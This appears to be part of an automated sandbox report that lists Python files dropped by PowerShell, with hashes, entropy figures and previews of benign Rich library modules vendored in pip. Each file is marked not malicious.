                                                                                                                                                                                                                              SHA-256:118A7DB9C8FE9C38D80E41C257A324D6F7BC9D43A9B852DA5BBE97E74322B363
                                                                                                                                                                                                                              SHA-512:F9C649F2DBCD06393C13D63FBB7E17B0B61A2BE4CEB4871EE65ABC4305A4E5EB977D1C7F1E8C51CB00EBF16D58DF837FBC52B364B539F54464E59E10F026497B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from pathlib import Path.from json import loads, dumps.from typing import Any, Callable, Optional, Union..from .text import Text.from .highlighter import JSONHighlighter, NullHighlighter...class JSON:. """A renderable which pretty prints JSON... Args:. json (str): JSON encoded data.. indent (Union[None, int, str], optional): Number of characters to indent by. Defaults to 2.. highlight (bool, optional): Enable highlighting. Defaults to True.. skip_keys (bool, optional): Skip keys not of a basic type. Defaults to False.. ensure_ascii (bool, optional): Escape all non-ascii characters. Defaults to False.. check_circular (bool, optional): Check for circular references. Defaults to True.. allow_nan (bool, optional): Allow NaN and Infinity values. Defaults to True.. default (Callable, optional): A callable that converts values that can not be encoded. in to something that can be JSON encoded. Defaults to None.. so
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3252
                                                                                                                                                                                                                              Entropy (8bit):4.818269455687887
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:CqdPzdFs8S2mon5AN2DVhPnpylL6Q/di2hJg3uD:ddPzdPwon5AUVhPoGQ/c27hD
                                                                                                                                                                                                                              MD5:CCE8F456C0E1F372C594B6091695EA72
                                                                                                                                                                                                                              SHA1:4CCDAB1925739170A634B5E3507C6249A3FFC649
                                                                                                                                                                                                                              SHA-256:432A0AA04FFC21D09BAED8921E9F53B1348DC931D8D053B9C2113B8CE4DDF541
                                                                                                                                                                                                                              SHA-512:6B48A5FD44791635160839F9ACBBE366282351BFC3670F17AA93C030A97FDBC2AF10F9DD1791E894C78E1EE9BAFE32782831D2C0064F917CD84C40D299A0484D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import TYPE_CHECKING, Any, Dict, Iterable, List, Sequence..if TYPE_CHECKING:. from pip._vendor.rich.console import ConsoleRenderable..from . import get_console.from .segment import Segment.from .terminal_theme import DEFAULT_TERMINAL_THEME..if TYPE_CHECKING:. from pip._vendor.rich.console import ConsoleRenderable..JUPYTER_HTML_FORMAT = """\.<pre style="white-space:pre;overflow-x:auto;line-height:normal;font-family:Menlo,'DejaVu Sans Mono',consolas,'Courier New',monospace">{code}</pre>."""...class JupyterRenderable:. """A shim to write html to Jupyter notebook.""".. def __init__(self, html: str, text: str) -> None:. self.html = html. self.text = text.. def _repr_mimebundle_(. self, include: Sequence[str], exclude: Sequence[str], **kwargs: Any. ) -> Dict[str, str]:. data = {"text/plain": self.text, "text/html": self.html}. if include:. data = {k: v for (k, v) in data.items() if k in include}. if exclude:.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14007
                                                                                                                                                                                                                              Entropy (8bit):4.442469633098098
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:BV1ZvLo5T5iHLfl2Hgoeg7lK/MzN6h+JEQihHxTwZRrTwVlY1PR7hsO5:BV3vIT5i0Hgoeg7hj6l8PRtsO5
                                                                                                                                                                                                                              MD5:FED3D43AD246B554BB5A6F619A18CA77
                                                                                                                                                                                                                              SHA1:DFB0603FC8261EED36A5CC598BF7C0ACBCF8A907
                                                                                                                                                                                                                              SHA-256:44560BE8774216C1DFF5646972F8B7C3E7E98FEF0EE5D319F16F7A55D28D75B2
                                                                                                                                                                                                                              SHA-512:E242F1AB046D145140592AE88260384959CEFDA44F7C12411A2E08EF6359E1F5CD53B56BD0831A7186AF7DA33BB87E19247AC388C191E1DB91D3536E31BF0657
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from abc import ABC, abstractmethod.from itertools import islice.from operator import itemgetter.from threading import RLock.from typing import (. TYPE_CHECKING,. Dict,. Iterable,. List,. NamedTuple,. Optional,. Sequence,. Tuple,. Union,.)..from ._ratio import ratio_resolve.from .align import Align.from .console import Console, ConsoleOptions, RenderableType, RenderResult.from .highlighter import ReprHighlighter.from .panel import Panel.from .pretty import Pretty.from .region import Region.from .repr import Result, rich_repr.from .segment import Segment.from .style import StyleType..if TYPE_CHECKING:. from pip._vendor.rich.tree import Tree...class LayoutRender(NamedTuple):. """An individual layout render.""".. region: Region. render: List[List[Segment]]...RegionMap = Dict["Layout", Region].RenderMap = Dict["Layout", LayoutRender]...class LayoutError(Exception):. """Layout related error."""...class NoSplitter(LayoutError):. """Requested split
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14273
                                                                                                                                                                                                                              Entropy (8bit):4.268561387120748
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:kK54eva5KJZc18N9Ymv/btmf61k4lpahfF0F:kkC56ZceCylF
                                                                                                                                                                                                                              MD5:E1A37B96E2353E581A3CB66E16495072
                                                                                                                                                                                                                              SHA1:C95BB3642D470414BC684D8A1CF307CCE93C15E0
                                                                                                                                                                                                                              SHA-256:BD9CD8BEEEDFAB096FDC6B61976C62C350DCFCEF3456519C095D03387C02C833
                                                                                                                                                                                                                              SHA-512:C351389FDFF6856B9B8EB449479E88E6FD1AE380F95FB853F11EC95BB5549BEA4587B87045862E318F761062A5A5CB9B91B7728914832055E76F09F5155DF6E1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import sys.from threading import Event, RLock, Thread.from types import TracebackType.from typing import IO, Any, Callable, List, Optional, TextIO, Type, cast..from . import get_console.from .console import Console, ConsoleRenderable, RenderableType, RenderHook.from .control import Control.from .file_proxy import FileProxy.from .jupyter import JupyterMixin.from .live_render import LiveRender, VerticalOverflowMethod.from .screen import Screen.from .text import Text...class _RefreshThread(Thread):. """A thread that calls refresh() at regular intervals.""".. def __init__(self, live: "Live", refresh_per_second: float) -> None:. self.live = live. self.refresh_per_second = refresh_per_second. self.done = Event(). super().__init__(daemon=True).. def stop(self) -> None:. self.done.set().. def run(self) -> None:. while not self.done.wait(1 / self.refresh_per_second):. with self.live._lock:. if not self.done.is_set()
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3667
                                                                                                                                                                                                                              Entropy (8bit):4.273892873415656
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ka12MInrjbRIfZZK5T8k+q5HwoZIkyOxso/:kaIMInrpIfZQ8AwmIkIu
                                                                                                                                                                                                                              MD5:F0037CF6749B4D3D6F744D57DB9385E5
                                                                                                                                                                                                                              SHA1:51A5F1D9C3C933447AFB8CB433CBE0A8D9E0D0FE
                                                                                                                                                                                                                              SHA-256:CC4966DCFADF488BE339C7B6F331131CC2147FDA45612500E68D007E58143FAE
                                                                                                                                                                                                                              SHA-512:C8E991896AB7A39F09FD5BDB681012A5C0DE67F5BCFB0D936AE56D39C9DF95DE8F3EDAB17E0F63E3EEE13743D0BF72643AF1CF6446B10ECCB62E26421303F7B4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import sys.from typing import Optional, Tuple..if sys.version_info >= (3, 8):. from typing import Literal.else:. from pip._vendor.typing_extensions import Literal # pragma: no cover...from ._loop import loop_last.from .console import Console, ConsoleOptions, RenderableType, RenderResult.from .control import Control.from .segment import ControlType, Segment.from .style import StyleType.from .text import Text..VerticalOverflowMethod = Literal["crop", "ellipsis", "visible"]...class LiveRender:. """Creates a renderable that may be updated... Args:. renderable (RenderableType): Any renderable object.. style (StyleType, optional): An optional style to apply to the renderable. Defaults to "".. """.. def __init__(. self,. renderable: RenderableType,. style: StyleType = "",. vertical_overflow: VerticalOverflowMethod = "ellipsis",. ) -> None:. self.renderable = renderable. self.style = style. self.vertical_overf
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11903
                                                                                                                                                                                                                              Entropy (8bit):4.6168999480502295
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:zA9+TZLPgjEE/i1sAU+TjYQCRTnOg5R/yviAXEdk7wH1lUWxqf0UqOy:z9BPgjuG8jYJzy6vdkkH1aWxUFy
                                                                                                                                                                                                                              MD5:0C56AEC264322B58B736D8DA809DB3A1
                                                                                                                                                                                                                              SHA1:644FDA0F18147D728D36010BA5E309AC957A1CF3
                                                                                                                                                                                                                              SHA-256:B81F9C07EDD0E1B9970CB2E96CE5A4985BE2C3E15D7B7F73C8C57AB4A2765874
                                                                                                                                                                                                                              SHA-512:3B94F12D7827E069EFB232DF5F546016702CBEFD9A3C20C14D6DCDFB974F675145ED7EC8EABB8CDCE5B8B9511DD70008DCF1C17EB7178EE11C472FD9D9F198B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import logging.from datetime import datetime.from logging import Handler, LogRecord.from pathlib import Path.from types import ModuleType.from typing import ClassVar, Iterable, List, Optional, Type, Union..from pip._vendor.rich._null_file import NullFile..from . import get_console.from ._log_render import FormatTimeCallable, LogRender.from .console import Console, ConsoleRenderable.from .highlighter import Highlighter, ReprHighlighter.from .text import Text.from .traceback import Traceback...class RichHandler(Handler):. """A logging handler that renders output with Rich. The time / level / message and file are displayed in columns.. The level is color coded, and the message is syntax highlighted... Note:. Be careful when enabling console markup in log messages if you have configured logging for libraries not. under your control. If a dependency writes messages containing square brackets, it may not produce the intended output... Args:. level (Union[int,
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8198
                                                                                                                                                                                                                              Entropy (8bit):4.274193130885141
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:xF4EDn7uK0+Iz6+Cf2FldMT7d0Z3aeOmDfJupg8NdZ/Bf4p:xaMSK0+qCMdMT7d0ZZT8BBf4p
                                                                                                                                                                                                                              MD5:76B015DBD910A9EEF9DF877C496F96AA
                                                                                                                                                                                                                              SHA1:32A3922A53150C2FE754D675F7C3FBC2642889B9
                                                                                                                                                                                                                              SHA-256:C73178B8069F884784603258B7FBD49C9386A1353C46B1FE3C7ED67166178C28
                                                                                                                                                                                                                              SHA-512:036AAEB933662784AF7CC93044E410927A4AE115A2804604CA34E699C359467620F6DA38F69586A713D21081C4C96CF991F297D5A11FE040190AA330286C27F1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import re.from ast import literal_eval.from operator import attrgetter.from typing import Callable, Iterable, List, Match, NamedTuple, Optional, Tuple, Union..from ._emoji_replace import _emoji_replace.from .emoji import EmojiVariant.from .errors import MarkupError.from .style import Style.from .text import Span, Text..RE_TAGS = re.compile(. r"""((\\*)\[([a-z#/@][^[]*?)])""",. re.VERBOSE,.)..RE_HANDLER = re.compile(r"^([\w.]*?)(\(.*?\))?$")...class Tag(NamedTuple):. """A tag in console markup.""".. name: str. """The tag name. e.g. 'bold'.""". parameters: Optional[str]. """Any additional parameters after the name.""".. def __str__(self) -> str:. return (. self.name if self.parameters is None else f"{self.name} {self.parameters}". ).. @property. def markup(self) -> str:. """Get the string representation of this tag.""". return (. f"[{self.name}]". if self.parameters is None. else f"[{sel
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5305
                                                                                                                                                                                                                              Entropy (8bit):4.385189692280883
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:N1zgZKd+cbIxEw4AEvRZnYgHtlJnbd6TcPH7zFBl5ngu/8O:N2ZKtkeYEvRZnYgHtPbd6a7zFBft8O
                                                                                                                                                                                                                              MD5:9A85D7D329B3550929E01D7B08F6AB05
                                                                                                                                                                                                                              SHA1:CECFBEF0E10CB7F974BD8F494E639EBD1C6990A6
                                                                                                                                                                                                                              SHA-256:1E6AC8257F2C5914C76E087C33111ACBFF37564A8D5BFEF4B3C68A3F965C608F
                                                                                                                                                                                                                              SHA-512:BC39E234C2D348F1BFE5C2761594B89125FC75730462B83F32FB4339BDC0D8BD1213EDEF63F889E3191FD3B76E5BC80B42ACC4D37DF5CD12AA1171D155A158A7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from operator import itemgetter.from typing import TYPE_CHECKING, Callable, NamedTuple, Optional, Sequence..from . import errors.from .protocol import is_renderable, rich_cast..if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderableType...class Measurement(NamedTuple):. """Stores the minimum and maximum widths (in characters) required to render an object.""".. minimum: int. """Minimum number of cells required to render.""". maximum: int. """Maximum number of cells required to render.""".. @property. def span(self) -> int:. """Get difference between maximum and minimum.""". return self.maximum - self.minimum.. def normalize(self) -> "Measurement":. """Get measurement that ensures that minimum <= maximum and minimum >= 0.. Returns:. Measurement: A normalized measurement.. """. minimum, maximum = self. minimum = min(max(0, minimum), maximum). return Measurement(max(0, minimum)
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4970
                                                                                                                                                                                                                              Entropy (8bit):4.4637009687656235
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:/QfEFyeWwTVHqmcHpxltdlgvmEfLvherSEbTJukfgdR9ngInYtxBV1:osAwTVHq3HLtOvmEjEpYsgdR9ngInYtP
                                                                                                                                                                                                                              MD5:A5009662298B328308BD59F23F058AE3
                                                                                                                                                                                                                              SHA1:40E397786A4DF256246C2E9E16C135B2A5CF8DD6
                                                                                                                                                                                                                              SHA-256:913146B1D19ED28B3BB572E71CAA704C8F7409712FADC79E6460AC866272E73C
                                                                                                                                                                                                                              SHA-512:7311E9407FE1D3113F28662B3ECF2D76A0671571EB5E0A437413BC21816BE0A8934D36C7F81BD960ECCC195673C9C57360EAD7C04CC0306B38AA47F32E8AAB46
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import cast, List, Optional, Tuple, TYPE_CHECKING, Union..if TYPE_CHECKING:. from .console import (. Console,. ConsoleOptions,. RenderableType,. RenderResult,. ).from .jupyter import JupyterMixin.from .measure import Measurement.from .style import Style.from .segment import Segment...PaddingDimensions = Union[int, Tuple[int], Tuple[int, int], Tuple[int, int, int, int]]...class Padding(JupyterMixin):. """Draw space around content... Example:. >>> print(Padding("Hello", (2, 4), style="on blue")).. Args:. renderable (RenderableType): String or other renderable.. pad (Union[int, Tuple[int]]): Padding for top, right, bottom, and left borders.. May be specified with 1, 2, or 4 integers (CSS style).. style (Union[str, Style], optional): Style for padding characters. Defaults to "none".. expand (bool, optional): Expand padding to fit available width. Defaults to True.. """.. def __init__(
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):828
                                                                                                                                                                                                                              Entropy (8bit):4.513073739230107
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1L8sEYBoDgl/KptAdr/H6/ez8Nnz86iOAdVyRXJ9GuUTtAd7eTI2peBw3+efFOjv:1uXMcptyza/cQiOyq7GTty78p5Ojrzn
                                                                                                                                                                                                                              MD5:D2F3F5A559BCF79942CE62B742FB2CE2
                                                                                                                                                                                                                              SHA1:66A01AAA2F82C4F00E8DDE3C2A7EB04E876613E7
                                                                                                                                                                                                                              SHA-256:48EFC44C114A6E0DE7FC080ECD79B8D52BF7E98C57032237FD1F8A398DBFB927
                                                                                                                                                                                                                              SHA-512:1A4B396A485930F04CE5A9B3E172EBDF7B826BB9F82818B3F90E24A1A25435921C93D66322F0F00BA57642268639234E8EC0DC195EB37C2DD1B15211761310AC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from abc import ABC, abstractmethod.from typing import Any...class Pager(ABC):. """Base class for a pager.""".. @abstractmethod. def show(self, content: str) -> None:. """Show content in pager... Args:. content (str): Content to be displayed.. """...class SystemPager(Pager):. """Uses the pager installed on the system.""".. def _pager(self, content: str) -> Any: # .pragma: no cover. return __import__("pydoc").pager(content).. def show(self, content: str) -> None:. """Use the same pager used by pydoc.""". self._pager(content)...if __name__ == "__main__": # pragma: no cover. from .__main__ import make_test_card. from .console import Console.. console = Console(). with console.pager(styles=True):. console.print(make_test_card()).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3396
                                                                                                                                                                                                                              Entropy (8bit):4.4122860472480765
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ZdKJpZHWsuuOKTrtq35aZReyn6PgT4yOd1f+4H5hZwc:yFuuO335+R/n6P1yOdd+4H5hZwc
                                                                                                                                                                                                                              MD5:D604E236B7A1900632C72E91BBB70442
                                                                                                                                                                                                                              SHA1:30F805997188595A92C7E3A32EFFDADF5D7F7E6A
                                                                                                                                                                                                                              SHA-256:9489EF4753830D3D9FDD464C7CBD60AEAEDD63FA4374A1F0E1B75480E19A3386
                                                                                                                                                                                                                              SHA-512:66A0F0F427EDBC89630FCCA0C3C38465ED0537D2C0F12A5435573E6B0823E5BB849F68A976E286EED2FC0337C2CB7E743DFEA529BD4DD0B36DB8C9611098E6A8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from math import sqrt.from functools import lru_cache.from typing import Sequence, Tuple, TYPE_CHECKING..from .color_triplet import ColorTriplet..if TYPE_CHECKING:. from pip._vendor.rich.table import Table...class Palette:. """A palette of available colors.""".. def __init__(self, colors: Sequence[Tuple[int, int, int]]):. self._colors = colors.. def __getitem__(self, number: int) -> ColorTriplet:. return ColorTriplet(*self._colors[number]).. def __rich__(self) -> "Table":. from pip._vendor.rich.color import Color. from pip._vendor.rich.style import Style. from pip._vendor.rich.text import Text. from pip._vendor.rich.table import Table.. table = Table(. "index",. "RGB",. "Color",. title="Palette",. caption=f"{len(self._colors)} colors",. highlight=True,. caption_justify="right",. ). for index, color in enumerate(self._colors):.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10574
                                                                                                                                                                                                                              Entropy (8bit):4.186365542613164
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:v+my0IHhSwHhO7z0/KGhwuVk07dX/tCBRL8ZZFcll:E0IHhSwHhOKxUP
                                                                                                                                                                                                                              MD5:2F4C4176EBB78FDB40A042F320070A30
                                                                                                                                                                                                                              SHA1:DD00D9AFEDCAD33F57B5F8BF29B9E955465A9ECD
                                                                                                                                                                                                                              SHA-256:C0631EE3427C2821A04283342F28D112B986224BF66EC600EF54425D3843D311
                                                                                                                                                                                                                              SHA-512:C161C9A8F71660C87ED1E98157A154EF027ED3700728F2D5D77F857BAB6FBFEE4D8EF9E8B1D690FA6FEA1ACA904BE3AEA8036E13F8E19F5F1ED51FAA9AC752C5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import TYPE_CHECKING, Optional..from .align import AlignMethod.from .box import ROUNDED, Box.from .cells import cell_len.from .jupyter import JupyterMixin.from .measure import Measurement, measure_renderables.from .padding import Padding, PaddingDimensions.from .segment import Segment.from .style import Style, StyleType.from .text import Text, TextType..if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderableType, RenderResult...class Panel(JupyterMixin):. """A console renderable that draws a border around its contents... Example:. >>> console.print(Panel("Hello, World!")).. Args:. renderable (RenderableType): A console renderable object.. box (Box, optional): A Box instance that defines the look of the border (see :ref:`appendix_box`.. Defaults to box.ROUNDED.. safe_box (bool, optional): Disable box characters that don't display on windows legacy terminal with *raster* fonts. Defaults to True.. ex
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35852
                                                                                                                                                                                                                              Entropy (8bit):4.27372827005392
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:mdM5wOTOMrv1kY/kwLnIMLcxYLmTVX9skw9L8H6Ue3559KTsLpc4/uFDgBM:mi59TOMZ/VrLKVX9sM84VgBM
                                                                                                                                                                                                                              MD5:DA8356FDB4B31CCF334BD5467B27AF61
                                                                                                                                                                                                                              SHA1:46868AC58DDA6A3B89787B820190731702EFE6BC
                                                                                                                                                                                                                              SHA-256:78B11837DC5568C36E03A1095589B8962EC774E1F10AA9952AF9CEA89A7216DD
                                                                                                                                                                                                                              SHA-512:3A1730C991DA0C72A0E689E7F3825C332FED4A564480282345D2277C42CB60B66F7688FAF4A9AF39E34576BC6C9AF2E231DB2F57EE5C4337426F53B50EDEA65D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import builtins.import collections.import dataclasses.import inspect.import os.import sys.from array import array.from collections import Counter, UserDict, UserList, defaultdict, deque.from dataclasses import dataclass, fields, is_dataclass.from inspect import isclass.from itertools import islice.from types import MappingProxyType.from typing import (. TYPE_CHECKING,. Any,. Callable,. DefaultDict,. Dict,. Iterable,. List,. Optional,. Sequence,. Set,. Tuple,. Union,.)..from pip._vendor.rich.repr import RichReprResult..try:. import attr as _attr_module.. _has_attrs = hasattr(_attr_module, "ib").except ImportError: # pragma: no cover. _has_attrs = False..from . import get_console.from ._loop import loop_last.from ._pick import pick_bool.from .abc import RichRenderable.from .cells import cell_len.from .highlighter import ReprHighlighter.from .jupyter import JupyterMixin, JupyterRenderable.from .measure import Measurement.from .text import Text
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):59706
                                                                                                                                                                                                                              Entropy (8bit):4.480068370840694
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:39dpA9JUU0knm1DJCM7SLeU7R8lox8MNBaNHkcy/hvaxXjw3E1VMIM7ScbK7bkl+:3LOkTkb7SlBCwJjpI3CnUS
                                                                                                                                                                                                                              MD5:45D63A8C93CE16284EEA536FCF2C077D
                                                                                                                                                                                                                              SHA1:A47D6519C83EFAB39212B16B1A93CB3E8FB1AD05
                                                                                                                                                                                                                              SHA-256:9F8285F6F932F3FE6261E5DCC993C4BF3C8BA655A50EF14B90CE4923406CD3C0
                                                                                                                                                                                                                              SHA-512:D135F99BF6C9CCD3D4890F4D8AD09A6D249129462600B7F998427DD307B13BB3B6163D3C40D652EF0429C710378A1A3D7907BE94475366CD01D5A5DFFC10E702
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import io.import sys.import typing.import warnings.from abc import ABC, abstractmethod.from collections import deque.from dataclasses import dataclass, field.from datetime import timedelta.from io import RawIOBase, UnsupportedOperation.from math import ceil.from mmap import mmap.from operator import length_hint.from os import PathLike, stat.from threading import Event, RLock, Thread.from types import TracebackType.from typing import (. Any,. BinaryIO,. Callable,. ContextManager,. Deque,. Dict,. Generic,. Iterable,. List,. NamedTuple,. NewType,. Optional,. Sequence,. TextIO,. Tuple,. Type,. TypeVar,. Union,.)..if sys.version_info >= (3, 8):. from typing import Literal.else:. from pip._vendor.typing_extensions import Literal # pragma: no cover..from . import filesize, get_console.from .console import Console, Group, JustifyMethod, RenderableType.from .highlighter import Highlighter.from .jupyter import JupyterMixin.from .live i
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8165
                                                                                                                                                                                                                              Entropy (8bit):4.450052631152956
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:wIqIeXttprQPvV/taio45C6HoqR2II2Qv57yI:peKtG4E6HbSlp
                                                                                                                                                                                                                              MD5:33F2E24B082E032F923D00B2C7928543
                                                                                                                                                                                                                              SHA1:429B0AAB3F07638D96B1477AFEF4463E603BCE74
                                                                                                                                                                                                                              SHA-256:704A017E473794BC2A6DAE172AC529CB8BD240A0E1D9043927627DE3E002168A
                                                                                                                                                                                                                              SHA-512:116173D386AAD60EC096BCFFF96FBDB01A51CE79314E61CAF6A4CD340EDE8FC6656F1489DBD8ADCC809E00FEFB0863B5A5181635C8D0F8055D7C2E3DA6AEFEE2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import math.from functools import lru_cache.from time import monotonic.from typing import Iterable, List, Optional..from .color import Color, blend_rgb.from .color_triplet import ColorTriplet.from .console import Console, ConsoleOptions, RenderResult.from .jupyter import JupyterMixin.from .measure import Measurement.from .segment import Segment.from .style import Style, StyleType..# Number of characters before 'pulse' animation repeats.PULSE_SIZE = 20...class ProgressBar(JupyterMixin):. """Renders a (progress) bar. Used by rich.progress... Args:. total (float, optional): Number of steps in the bar. Defaults to 100. Set to None to render a pulsing animation.. completed (float, optional): Number of steps completed. Defaults to 0.. width (int, optional): Width of the bar, or ``None`` for maximum width. Defaults to None.. pulse (bool, optional): Enable pulse effect. Defaults to False. Will pulse if a None total was passed.. style (StyleType, optiona
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11303
                                                                                                                                                                                                                              Entropy (8bit):4.43699046794763
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:mchRbuyp1UkLWCbdSzkPO2sGvk7DCkgwbJQhx4/3WPqEXBnh:9RaWUkLWgQCvkbFQbw4Bnh
                                                                                                                                                                                                                              MD5:E0281226F8FB9EA9A3D09525BB501715
                                                                                                                                                                                                                              SHA1:244E7DF24D577C830A6226F32DEB8AA37845D3B4
                                                                                                                                                                                                                              SHA-256:C74996FA920FA1D24CE2BCBA82B82698BAE5F15669F7D92A72676705EEF46180
                                                                                                                                                                                                                              SHA-512:F7E7C74C717FBCC1EF5ED921B752FD231E9445E1480EC53DA72361333A212EE7B7162FBD7932C4E4B839C32A6B7328457777697FA5D30C1A3D7AF83F3E4DE959
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import Any, Generic, List, Optional, TextIO, TypeVar, Union, overload..from . import get_console.from .console import Console.from .text import Text, TextType..PromptType = TypeVar("PromptType").DefaultType = TypeVar("DefaultType")...class PromptError(Exception):. """Exception base class for prompt related errors."""...class InvalidResponse(PromptError):. """Exception to indicate a response was invalid. Raise this within process_response() to indicate an error. and provide an error message... Args:. message (Union[str, Text]): Error message.. """.. def __init__(self, message: TextType) -> None:. self.message = message.. def __rich__(self) -> TextType:. return self.message...class PromptBase(Generic[PromptType]):. """Ask the user for input until a valid response is received. This is the base class, see one of. the concrete classes for examples... Args:. prompt (TextType, optional): Prompt text. Defaults to ""..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1391
                                                                                                                                                                                                                              Entropy (8bit):4.677919843990067
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1RE+Gvpa4VWg60Wno0nN4RD6w5MojjfupzvoWgDnx6NWHa5c:yxa4Ig6Vo0nil6yMIj6bAnksKc
                                                                                                                                                                                                                              MD5:ECCF6E3694A59DBF6F3E5ADFBA43F6FC
                                                                                                                                                                                                                              SHA1:A2DCA9D46365F198635DE5BBFD6C2628566AB28F
                                                                                                                                                                                                                              SHA-256:E611C70C3347724764F22587E7311B8BECEE215485E616D4DA3228E3B47B9531
